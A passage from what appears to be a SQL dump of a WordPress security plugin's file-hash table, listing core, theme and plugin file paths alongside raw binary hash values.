M�1�R����V��','��I؞<�(N�H~Wx�E�r�1M�A��K�wQ','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('����w�_:�5o�','wp-content/themes/nirvana/fonts/sourcesanspro-bold-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F��)�����.��','��!Q�އf���]2�\Z�G/��Ђ�C�`��','',0,'?'),('��]1���\Z�>','wp-content/themes/sg-window/inc/widget-sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/7>)V#`�(�����Y','�TvڐYF��6Z<��\'ck��*x��0��','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'���	t���:�Q�o]{5G1����E��','',0,'?'),('��-���\rؗT�,�>','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.eu.php',0,'l\Zb=�����hT�2G\"','l\Zb=�����hT�2G\"','�ӷ#��%m˼B�������!ZV���I�0߉�','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K_uj:mJ{S���R','Mw~\r�\r�m\"��M������=���I��','',0,'?'),('��{�� \r�Slſ�	','wp-content/plugins/wordfence/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HpY�yE�r���(\\	','��^s�ټ	E���\n&�9Я�̆����','',0,'?'),('��S�2��6�[o�\r#','wp-content/themes/hueman/option-tree/assets/js/vendor/jquery/jquery-ui-timepicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�š2�H~G�WQ��','\r(;E^��HcN�׼3v�#y��N���','',0,'?'),('���Y?�s���\n�b�','wp-content/themes/clean-magazine/inc/customizer-includes/clean-magazine-customizer-custom-controls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`Cȼ���;7=��','p�z�8<���:T\'jH2�6��-ȕ��u��HBV','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��L�n�?2��a~��','�+p��=���ͨ�\'�Bk���@Cr\'ͺ�\'','',0,'?'),('�㯩�	\'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X%	�<8�g4�','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','wz�PQQ�#�Z>\0��D�','���i:��i`�\"��J��%<:���I��xcJ','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �������Q��L','���R21�?nj*=bͥ}�����X&��M��Ʒ','',0,'?'),('��$p�̚D=S�','wp-content/themes/sg-window/publication/template-parts/content.php',0,'/4=���1o%/���','/4=���1o%/���','�����\\|�-�%B��##w�f�� ƪ�','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('���P������w�','wp-content/themes/mh-magazine-lite/admin/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\\[�N��[�s/',' V��<�����,�ٞ��l�V�&a��','',0,'?'),('�&��gJP���5�@','wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-htaccess-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')��/�v����&|�;��','�Y��Kn��D ���i\'�$�7-}�`�W�BǦ','',0,'?'),('�1��5��,A\0\'','wp-content/plugins/unyson/framework/extensions/update/views/updates-list.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���!��FM�_��s','T����r3���?�m��7k�\'�wU\Z','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('�6	uO��˧���A�','wp-content/themes/supernews/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L0�ް�f�r{̵8>	','��|���ڕ01����\\m]~Ȓ�-W��m\r�r','',0,'?'),('��\"\Z�^��K��sB','wp-content/themes/relia/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̃��.�R�~�','N�I��2eZ�I� ��#}¡�k�\r_�PU�G�','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�)��4I����]�4�\n�','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/divider/options.php',0,'����PL١!�1��','����PL١!�1��','�\'���H$H�#�џ�\'���9:V�e�F�\n�4�','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(��|v�}�9S�9S','\n,,Y�B��:�En������4�f\r�,��Zbq','',0,'?'),('�Mb��$�ylDU�%��','wp-content/themes/travelify/library/tgmpa/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�(^�=!\"X�&TX��','�k�A\\ ˎ���W����on��3�����','',0,'?'),('�U�V5�-�\'�{+W','wp-content/themes/sg-window/sidebar-2-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�9����AT���	','�6\'�S ^��	]����灸9f^��wL�p��[�','',0,'?'),('�X��b������])<�','wp-content/themes/hueman/assets/front/img/demo/4-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���(뾄ƙI�v\0','�T>�q�F����qD�fi�P@?��U;-�','',0,'?'),('�b��Pj���h�Oz_','wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ዿa*.C��q�/N','�Iٖ��KJ\"�t�ϭ^�b_[#f�K�:O)g','',0,'?'),('�LC���;(z~��PC','wp-content/themes/panoramic/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&�!�������','ӝ\"ձ��=#բVd�L:����{�����@J','',0,'?'),('��T��ʦLw [���z','wp-content/themes/square/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&\0pr�~^\Z��]��&','�ٮ���#���7\0�a�[c�8�7���>P[�$1�','',0,'?'),('�uZ9/>g��a�E�','wp-content/themes/point/js/addons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��j�ҦȄ�M��','Ld��@�ǰ��+n?ϐVik0��>�\r�lS�','',0,'?'),('�N ���iiڭ�','wp-includes/random_compat/random_bytes_libsodium_legacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[q�7d�v���z�','\'֪��*	[\0EE*J�r�V�s�����c�?','',0,'?'),('�V��6��=/��Ԕ','wp-content/themes/verbosa/cryout/css/widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��q,��	^��DV','H�I�Q�w·����<�+�*o�)�V�q�����','',0,'?'),('��y�u�n���c[٧�','wp-includes/sitemaps.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gG�xN�)�/���*','�%��S�i����x3�k���O��nz]���','',0,'?'),('��P�=f��Wd�>s','wp-content/plugins/unyson/framework/languages/fw-ru_RU.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Wvs����Ȋ(l	�','-�\r\'l��;KY����+e�� mu`�3.h','',0,'?'),('�з&�L۽¨��VN�','wp-includes/css/buttons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\Z�A��6@Զ.+O�2�','rQ�-,+2N(��f�g�\"�I��\Z��}�*J','',0,'?'),('���\0���7�uKՎ�','wp-content/plugins/unyson/framework/extensions/shortcodes/includes/class-fw-shortcode.php',0,'�Bj��?HZU2����','�Bj��?HZU2����','\0����e�2r�3���\Z�3��M$����!�\"x','',0,'?'),('���\"��e%�7(�,','wp-content/plugins/dw-social-share/screenshot-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�srR}`ZX����','|3��ZB$�u�oѓ\"�p視��?��X�֥��','',0,'?'),('��I�6H\r%�j�F=','wp-content/plugins/contact-form-7/languages/contact-form-7-ckb.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=����\0MA^�','���8bg�N|g���/�:٫�+�)H��K�\r�+','',0,'?'),('����?3�u�\0��b','wp-content/themes/clean-magazine/languages/pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qU�F�0�\'���','��eޅ⥟�+�E��tT����5�L��h','',0,'?'),('����6$[���O�','wp-admin/css/customize-widgets.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X�����<�.�','LVuGs�����2�C�ݯ�s�BY�/�Y�','',0,'?'),('��(�Tl>�Oq���D','wp-content/themes/skt-construction-lite/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%s43�C�mV~��B','M�p�k�ji��*�̮T�C�n�? ','',0,'?'),('��`��:��pG��','wp-content/plugins/wordpress-seo/js/dist/wp-seo-shortcode-plugin-350.min.js',0,'���2�xyg�ŏ�Y�','���2�xyg�ŏ�Y�','>s�@P��0w6aqS#x���\"xCXot����1','',0,'?'),('���rp.u�3zx�','wp-admin/includes/class-ftp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����c�Z*l3��$�','�B�1ô�	ͥ��5 �Q�������9�J','',0,'?'),('�&�?.\r�s��;�=9','wp-content/themes/twentynineteen/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W4����|$\rԄ5q','L\\�]D�Q��4�K�A�\r��Ŗ','',0,'?'),('�\Z`۽���\'�z��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/widget-area/config.php',0,'\0�I\'�{�����inr','\0�I\'�{�����inr','a�5�\Z�/�5��j�,��襨����G�GP�V�','',0,'?'),('�\"�����5fQ�j�','wp-content/themes/travelify/library/panel/images/no-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�/<qP=���*s\0R','�[�Ђ;��I�u�����Ҥj�5]�E��>�E','',0,'?'),('�&[��>j���/��GU','wp-includes/js/dist/token-list.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','癭�OB�!ɉ߀zrB	','����N��_\0�\'�e�]���oϼAp ','',0,'?'),('�&���n�duV*�\\','wp-content/themes/hueman/functions/czr/tmpl/modules/all-modules-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�^���P\Z��v2�','��o��}�����\Z��@CS�\"�W��O�|`��','',0,'?'),('�6	�i@�/y���f�?�','wp-content/themes/relia/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DQ�L�\'���9M�','�Q�vWS��Am3ϑ0j�h��wxG��R�&+�~Kc','',0,'?'),('�7s�\\]�}�AA�we1�','wp-admin/tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r:f��o�\0V�G�r�',',w2�ч���B\\���oZ�i��X\n�#׀��U','',0,'?'),('�:UK���\n᳗�','wp-content/themes/skt-construction-lite/images/search-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ω�W吃`\0�d��O','�\0��E�8O2�}�\'�y�>��e�(8�8','',0,'?'),('�@X���-�+���D�','wp-content/themes/hueman/assets/front/img/thumb-standard.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')%���Q��n���5','}f�MWyw�H���pz�|�^��TRq�lg�8i�','',0,'?'),('�I�IN��-����c','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_vendor-prefixes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8�I�}�o‰�B]b','���s{��w\"S�(l�6Em|��c��	\0��R��','',0,'?'),('�K|\"���j���>��&','wp-content/themes/hueman/assets/front/fonts/titillium-lightitalic-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�m��e#UtH2','.��G\n��&)�2W����)��%ۄ\Z\Z�V�@\"','',0,'?'),('�Z/���{Lt�ծF$�','wp-admin/js/svg-painter.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�*w�j��q�@��','��)@�y���w�b�3���\\���ZK��_�','',0,'?'),('�euE�R��x1�ڃ�~y','wp-content/plugins/unyson/framework/static/libs/unycon/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9qV	˕r��{�S8�','�	\\݁9�c�g�lypj������R�$yj','',0,'?'),('�mM��ɱ�����t','wp-content/plugins/dw-social-share/assets/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W ����C�~O�E�s','/ن}���W��^�z��&�;tةIY-�y-�.','',0,'?'),('�w�Yb�	��|j���','wp-content/themes/nirvana/js/nivo.slider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��{mF�me��','�[b��҆)���:��M�:GH���@','',0,'?'),('�v�:�D�Y�G','wp-includes/js/plupload/plupload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('�q��Z1���/L','wp-content/plugins/dw-megamenu/lib/widgets.php',0,'�(�-D�exr7�7r�x','�(�-D�exr7�7r�x','����d٭6��	A���o�:��~�=��','',0,'?'),('�fd�R�aʤ.��D','wp-content/plugins/unyson/framework/extensions/social/extensions/social-twitter/manifest.php',0,'x�G��S���a�p�','x�G��S���a�p�','�	;���K��*�4�ټy>Q�<��m�m##','',0,'?'),('�TY�PpE�w��','wp-includes/widgets/class-wp-widget-archives.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�POůJ�~�l�.�J','�o���`|?�0�5���q����_	!-+}Q�V-�','',0,'?'),('��4�����$ꎪ','wp-content/plugins/wordfence/views/scanner/scan-scheduling.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A�i@�\\�`=�y�7\0','���-\020�[��5�B���c��^V�u8��k�','',0,'?'),('��5�0d�����d','wp-content/plugins/spam-captcha/img/icon-256x256.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}���@G����L�','X��}��C��~lJz��J��q�����5�','',0,'?'),('��u��ʇqU�5���','wp-content/themes/mh-magazine-lite/images/bg_direction_nav.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�ɲM�L�O��`�','V՗ײ�^�\ZN��q��J,!��v���<','',0,'?'),('���N�ŏ�KlQ�','wp-content/plugins/wordpress-seo/vendor/yoast/license-manager/views/index.php',0,'6L�2Ӳ�k�1:��B��','6L�2Ӳ�k�1:��B��','|�ٮ�Y�sL�ksi30�\r�vʵ��g','',0,'?'),('�絛�zy���>_+�t','wp-includes/class-wp-user-meta-session-tokens.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8/\'\0�\0��vSL-G\0','����8�b�YB&?�6��o���>','',0,'?'),('���H�r #�w/�:4','wp-includes/js/dist/plugins.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f:����D�<V0�Jە','t�@�q�t�8�J�\n���o\r���e�+�S���','',0,'?'),('�+�ܞ�t���c��','wp-content/themes/clean-magazine/js/source/clean-magazine-customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r<U��Y�\Z��/�j','c�2���0ꡳ)����w<C8f��Q�;�sм','',0,'?'),('�1\n�����x����','wp-includes/blocks/latest-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i{�$F�ČPի!','\Z:����F��s�K�����\\��W����\r��','',0,'?'),('�?��E_�)�xڅ$��','wp-admin/includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I��i�p|���^��',':a����7�z�>�)�x}P3}','',0,'?'),('�Fl��H�}�j����','wp-content/themes/illdy/layout/js/owl-carousel/owl-carousel.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S���-BrT�W�G�','\nk�%��a;X�O��=$�Q�8m�?m2�{x��','',0,'?'),('�UM����ڢ�0K|�$','wp-content/themes/accelerate/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rNI��IϿ�2�Ơ','d2�r��*@��{��e���D�у�C�[�>�','',0,'?'),('�[�B�k��h56�O','wp-content/themes/nirvana/templates/template-blog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\Z���G3\\\")@�,','�QL�Lٸ֤��s.Qw%�i��+*���|~','',0,'?'),('�]�d{�|�t���r�','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/mixins/_reset-filter.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�ɢg��4�ھ�Z�','nd�,��8FQ�Z�N�W5�w-މ]qn�','',0,'?'),('�cȿ�Ԃ�֤a[{�','wp-content/plugins/all-in-one-wp-migration/lib/controller/class-ai1wm-import-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2(�{J\'�����I�','�QH��������I+��n�3��dPj�U�-','',0,'?'),('�d�To�f��ҷ�bS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1q��X}k8�','����\ZI(�b��ܚo��ߍ�9�\0�	ȅE2','',0,'?'),('�j��\nj<�c�@B�X','wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�q�טw�U��ͰR�','�JwYw�u�n��[���&D�FLV-�2L���','',0,'?'),('�lA5/L������N�','wp-content/themes/alpha-store/lib/cmb_extension/js/select2/select2.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=c�ƕ��ׂ�Z�j$','ay�Ë�Pwbs�Go�E�Z�Ѯ�\n�\Z&','',0,'?'),('�po���X0%������','wp-includes/css/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�o���6�(�q\'','��x^��,Z�Qv�\0Ȋ�n�Kn�{�\r� D��','',0,'?'),('�u;Ȍ0�q�w��=��','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8q�X�n�_�tҐi�','Sb�O��m����/IQ>SĊW�ɖT�oV�+a','',0,'?'),('�v�|\r%m�ϊ��q�{','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/column/includes/page-builder-column-item/class-page-builder-column-item.php',0,'\0��\Z�VV�����5','\0��\Z�VV�����5','��-fa�JJ߼�i)?=��<c#��lh�ū��','',0,'?'),('��F��Wr�V��','wp-content/ai1wm-backups/index.php',0,'�A�-pޜ\r͈V�','�A�-pޜ\r͈V�','=���+��O���²���2E[�V�����OD','',0,'?'),('�2�\rܘϵu\0��#VE','wp-content/plugins/unyson/framework/includes/option-types/slider/static/libs/ion-range-slider/ion.rangeSlider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*��*-����N���','�< ����\Z�K�|=K}�:m�E�� �aZ','',0,'?'),('���m;b���O�`�L','wp-content/themes/panoramic/customizer/mods.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�:�#d�l7}?`3R','\r���2��7��Hj5�_a��\"�Bӵb�','',0,'?'),('���jK�&����Y','wp-content/plugins/akismet/class.akismet-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�&+�!�]�M�','���iK�I�]�#:6���o�EP�\n�nR$���\r','',0,'?'),('�կ��\"C����','wp-content/themes/barletta/css/dev/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tt�D���D�ĉ:','Iu�7;��)2���ʕ+ۑ>��M�Q٤�r�','',0,'?'),('�\"�r�W��� �','wp-content/themes/precious-lite/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%.��\'=\r	�\0�C','�i�	��;�+�e6����?g���:M�57','',0,'?'),('�Q���傾�','wp-content/themes/the-minimal/images/right-sidebar.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�u��ћ\Z�_-o=Z$g','�����$�~��#$N��\n�:����V���{','',0,'?'),('�5ծ�x��p��1','wp-content/plugins/spam-captcha/core/translation.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�~\\���R+	hZ(�','q�A\\)m�C��\n�Q�ĝ��{�BdTu���','',0,'?'),('��jJ��6���*j�','wp-content/themes/mh-magazine-lite/languages/uk_UA.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�P��f��wh��f,','2�r��\0ޓ*9?|�rn\r9�����rfn1�U,�','',0,'?'),('��l6m�I�]�(','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-icons_ef8c08_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l��@A���p�e�&','Y?̶\\�aJh�E�bn.[(���\Z�����[�0;','',0,'?'),('�d�\'�����W�','wp-content/themes/vega/assets/css/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������O���4�','~��RhL7�\00���DVi��ג`1R�R/�at','',0,'?'),('�$c{�97^І�J�g','wp-includes/js/dist/server-side-render.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��m\\5Y!-����7�','�=G6tҭ]�����f�%cɸ�g�ѽ�\0u�','',0,'?'),('��ŕ��oi|}��','wp-includes/block-supports/custom-classname.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؚ�WiY�C��v�G','� #rCҗ�)�[�ȫ�R̞[���Q�\\�&��','',0,'?'),('�M�٦M�/`�','wp-includes/js/swfupload/handlers.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*�#�0�-�Ճp�','H�#����a:��1������߯orrj�uz�zV','',0,'?'),('򱠭��B�R�z��Y','wp-includes/js/jquery/jquery.table-hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�go����~i�I	�','�<��=���;�:�t_,w�ăI���,�,��','',0,'?'),('�?{o_���\'�n�','wp-admin/images/resize-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{3VV��FV�f�%K','懴y2q��Z�o��~��([��`\0`C�i\ZL\'','',0,'?'),('���_f $�O<o','wp-admin/js/common.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9��;�[�G~��','(�	ˊZ���d��cn�f%\'J��]�d`\Z:9','',0,'?'),('��%�\0��z�f�N�pS','wp-includes/js/tinymce/plugins/wpemoji/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SE���x=d��~���eM','\"�w�%%{���=L(���hK�\rƢH�P','',0,'?'),('��w�+\"+�$��^�','wp-content/plugins/wordfence/lib/wfLog.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WN ;ƶxv��/	�','K�PQn\"�_(�X/4S�䖏C�9�yA�K�L','',0,'?'),('���\\�y�i2�','wp-content/themes/point/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ëd&�e��C','�8j��T�����.�o�ߝA�4���̟	=�.� ','',0,'?'),('���*�\0��Lt!U','wp-content/themes/precious-lite/images/slides/slider2.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#.�����O29�F��\\�','S�`�Q�:[�ڝ\rh�3ִ<�Ȋ#�Yw�A','',0,'?'),('��w(�\'�s�y��:6','wp-content/themes/twentynineteen/template-parts/content/content-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�س���T��+W�','\roh}�}i��V�A�ԁ�H�!v�>4}��M','',0,'?'),('���v�O|!�A�5O','wp-content/themes/square/template-parts/content-summary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�TZ�)� ����9','�y��Ng�] �K�]��}R����K7��<�','',0,'?'),('���<�fÃ�y\0�Y','wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(������H�tdOm','�H�5\'M���>� ��	�����2=��$I�R��','',0,'?'),('��i�K��Dz�\'�Qt','wp-content/themes/mh-magazine-lite/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=�W���b&�W','�}�.�����$]���%�0��R�Y�Sy�','',0,'?'),('�#\\���/�vXR','wp-admin/js/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~x�����','ܕH#��~5^�$t�d�6P.�.Ub@�����','',0,'?'),('�(�R�1�)eS�!;:','wp-content/plugins/spam-captcha/core/lang/SL_framework-zh_CN.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���<�-$7s<�$','�*��	3k�[����}B�~Ϻ�XϜ&i�','',0,'?'),('�+��%l�E���D��','wp-content/themes/nirvana/js/jqueryui/css/ui-lightness/images/ui-bg_diagonals-thick_18_b81900_40x40.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����B�>�~�n�T�','4��\\����	Gݳ�s�Ƞ��:bz��','',0,'?'),('�?�c�q�]>���c','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/static/js/scripts.js',0,'�x��~\n�	#	#v�b�','�x��~\n�	#	#v�b�','4�y\0?�~Z��&M�\n��+?�cE����','',0,'?'),('�Bڶֵɂl�DG�q@','wp-content/themes/skt-construction-lite/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��5y���\'sP��R�','��?A}$��Ttra��f�z�HK^��Uy/n�p','',0,'?'),('�I8)-�m*?�ۭ����','wp-content/themes/vega/assets/js/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��\Z�%�\\C>|\Z�','w�;,�Yný럢[vp��yј2\"����O�','',0,'?'),('�L����{��Fuw�j:�','wp-content/plugins/spam-captcha/lang/spam_captcha-es_MX.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t]��~�A�6','պ`m�7�9U*fe^��������HG�5D�','',0,'?'),('�V�<��r\nQ�]jvXP','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z���*Nf�ټ{��','i��˶|1���v.4[�(�����m@f>��','',0,'?'),('�c�E%D���	��雩','wp-content/themes/twentynineteen/sass/blocks/_blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�clF�,C>v�W���','bx�͗߇��J�Ne���������@RP','',0,'?'),('�lF����c뒕�L���','wp-admin/js/iris.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�0!2�}�=��n��','�K��<<�6[��0�j�0��vg������J=�','',0,'?'),('�m��-]^�����_�?','wp-content/plugins/unyson/framework/includes/option-types/popup/static/js/popup.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5+��<:��2L�','E��~�,U�X��hL�E+X��mv�x!����','',0,'?'),('�{Yh1�0��>4��d�','wp-content/themes/illdy/inc/tgm-plugin-activation/class-tgm-plugin-activation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K`�UOck�=���','5۷����Al�3M��M<��$1�h�K�N�*���\Z','',0,'?'),('��,�o�!�z�j\"�','wp-admin/css/edit.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����b�i��M�D�','�\\�\0wºC�7G�:�G\"G�y�{	�m��+','',0,'?'),('�ؠ]�f���P��','wp-content/plugins/wordfence/lib/wfLockedOut.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Vb�*���\nog�D�','�o����Ч���$E�71�8�K�I�E','',0,'?'),('�4Sl�,�\rK8�